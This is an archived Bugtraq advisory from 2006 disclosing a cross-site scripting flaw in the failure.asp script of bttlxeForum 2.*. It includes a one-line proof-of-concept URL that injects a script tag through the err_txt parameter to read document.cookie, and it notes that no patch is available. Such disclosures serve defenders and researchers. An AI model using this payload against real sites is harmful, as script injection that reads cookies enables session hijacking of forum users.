Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

bttlxeForum 2.* XSS Vulnerability

From: stormhacker () hotmail com
Date: 26 Feb 2006 18:05:15 -0000
--------------------Summary----------------
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus 
(worlddefacers.de securitycentra.com)
-----------------Description---------------
Vulnerable Script: failure.asp
--------------Exploit----------------------
http://www.example.comforums/failure.asp?err_txt=<script>alert(document.cookie);</script>
--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: runvirus
(worlddefacers.de securitycentra.com)
Previous By Date Next
Previous By Thread Next

Current thread: